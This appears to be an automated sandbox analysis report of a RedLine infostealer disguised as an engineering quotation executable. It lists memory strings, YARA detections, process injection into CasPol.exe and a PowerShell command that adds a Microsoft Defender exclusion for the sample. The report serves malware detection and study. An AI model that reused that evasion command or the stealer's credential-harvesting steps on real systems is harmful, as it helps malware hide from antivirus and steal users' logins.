                    Source: CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: CasPol.exe, 00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                    Source: CasPol.exe, 00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 5.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: RFQ_TFS-1508-AL NASR ENGINEERING.exe PID: 5276, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: CasPol.exe PID: 3168, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: RFQ_TFS-1508-AL NASR ENGINEERING.exe
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeCode function: 0_2_00007FF848F0AA300_2_00007FF848F0AA30
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeCode function: 0_2_00007FF848F01D100_2_00007FF848F01D10
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeCode function: 0_2_00007FF848F02E800_2_00007FF848F02E80
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeCode function: 0_2_00007FF848F0D9990_2_00007FF848F0D999
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeCode function: 0_2_00007FF848F02F6D0_2_00007FF848F02F6D
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeCode function: 0_2_00007FF848F07B600_2_00007FF848F07B60
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeCode function: 0_2_00007FF848F137010_2_00007FF848F13701
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeCode function: 0_2_00007FF848F090D40_2_00007FF848F090D4
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeCode function: 0_2_00007FF848F1374E0_2_00007FF848F1374E
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeCode function: 0_2_00007FF848FD00000_2_00007FF848FD0000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_006EE7105_2_006EE710
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_006EDBF05_2_006EDBF0
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5276 -s 1056
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exeStatic PE information: No import functions for PE file found
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs RFQ_TFS-1508-AL NASR ENGINEERING.exe
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000000.2037022800.000002DBA8A06000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHurensohn.exe4 vs RFQ_TFS-1508-AL NASR ENGINEERING.exe
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2322806230.000002DBAA700000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameUxukomud6 vs RFQ_TFS-1508-AL NASR ENGINEERING.exe
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exeBinary or memory string: OriginalFilenameHurensohn.exe4 vs RFQ_TFS-1508-AL NASR ENGINEERING.exe
                    Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 5.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: RFQ_TFS-1508-AL NASR ENGINEERING.exe PID: 5276, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: CasPol.exe PID: 3168, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@12/55@1/1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: NULL
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5276
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5mpkhr5.5nq.ps1Jump to behavior
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: tmpA032.tmp.5.dr, tmp67D8.tmp.5.dr, tmp46EF.tmp.5.dr, tmpA021.tmp.5.dr, tmp4701.tmp.5.dr, tmp4713.tmp.5.dr, tmpA031.tmp.5.dr, tmp67E8.tmp.5.dr, tmp4712.tmp.5.dr, tmp4742.tmp.5.dr, tmp6808.tmp.5.dr, tmp46F0.tmp.5.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exeReversingLabs: Detection: 48%
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeFile read: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe"
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5276 -s 1056
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -ForceJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
